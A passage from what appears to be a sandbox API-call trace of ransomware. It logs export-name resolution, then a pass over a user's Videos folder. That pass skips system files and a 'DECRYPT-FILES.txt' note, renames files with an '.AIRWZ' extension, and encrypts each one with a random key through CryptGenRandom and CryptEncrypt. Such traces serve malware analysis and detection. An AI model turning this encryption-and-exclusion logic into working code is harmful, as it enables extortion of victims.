returned="CreateHardLinkTransactedW" [0087.129] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.129] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.129] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.129] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.129] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.129] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.129] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.130] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.130] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.130] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.130] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.130] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.130] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.130] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.130] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.130] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.130] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.130] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.130] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.130] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.130] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.130] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.130] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.130] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.130] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.130] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.131] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.131] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.131] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.131] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.131] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.131] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.131] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.131] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.131] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.131] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.131] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.131] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.131] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.131] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.131] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.131] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.131] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.131] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.131] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.132] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.132] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.132] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.132] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.132] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.132] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.132] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.132] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.132] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.132] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.132] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.132] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.132] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.132] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.132] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.132] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.132] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.132] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.133] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.133] lstrlenA (lpString="DELETEATOM") returned 10 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.133] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.133] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.133] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.133] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.133] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.133] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.133] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.133] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.133] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.133] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.133] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.133] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.133] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.133] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.133] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.133] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.133] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.134] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.134] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.134] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.134] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.134] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.134] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.134] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.134] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.134] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.134] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.134] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.134] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.134] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.134] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.134] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.134] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.134] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.134] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.135] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.135] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.135] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.135] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.135] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.135] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.135] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.135] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eD8jo.flv") returned 46 [0087.135] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eD8jo.flv.AIRWZ") returned 52 [0087.135] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eD8jo.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ed8jo.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eD8jo.flv.AIRWZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ed8jo.flv.airwz"), dwFlags=0x0) returned 1 [0087.136] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.136] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.136] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.136] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dd4cb60, ftCreationTime.dwHighDateTime=0x1d4d599, ftLastAccessTime.dwLowDateTime=0xa733ef90, ftLastAccessTime.dwHighDateTime=0x1d4d08a, ftLastWriteTime.dwLowDateTime=0xa733ef90, ftLastWriteTime.dwHighDateTime=0x1d4d08a, nFileSizeHigh=0x0, nFileSizeLow=0x3566, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fnxRi.avi", cAlternateFileName="")) returned 1 [0087.136] lstrcmpiW (lpString1="fnxRi.avi", lpString2="DECRYPT-FILES.txt") returned 1 [0087.136] lstrcmpiW (lpString1="fnxRi.avi", lpString2="autorun.inf") returned 1 [0087.136] lstrcmpiW (lpString1="fnxRi.avi", lpString2="boot.ini") returned 1 [0087.136] lstrcmpiW (lpString1="fnxRi.avi", lpString2="desktop.ini") returned 1 [0087.137] lstrcmpiW (lpString1="fnxRi.avi", lpString2="ntuser.dat") returned -1 [0087.137] lstrcmpiW (lpString1="fnxRi.avi", lpString2="iconcache.db") returned -1 [0087.137] lstrcmpiW (lpString1="fnxRi.avi", lpString2="bootsect.bak") returned 1 [0087.137] lstrcmpiW (lpString1="fnxRi.avi", lpString2="ntuser.dat.log") returned -1 [0087.137] lstrcmpiW (lpString1="fnxRi.avi", lpString2="thumbs.db") returned -1 [0087.137] lstrcmpiW (lpString1="fnxRi.avi", lpString2="Bootfont.bin") returned 1 [0087.137] lstrlenW (lpString="fnxRi.avi") returned 9 [0087.137] lstrcmpiW (lpString1="avi", lpString2="lnk") returned -1 [0087.137] lstrcmpiW (lpString1="avi", lpString2="exe") returned -1 [0087.137] lstrcmpiW (lpString1="avi", lpString2="sys") returned -1 [0087.137] lstrcmpiW (lpString1="avi", lpString2="dll") returned -1 [0087.137] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.137] lstrlenW (lpString="fnxRi.avi") returned 9 [0087.137] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.137] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="fnxRi.avi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fnxRi.avi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fnxRi.avi" [0087.137] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fnxRi.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fnxri.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.137] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=13670) returned 1 [0087.137] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.137] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.138] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.138] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.138] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.140] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.140] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.140] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, 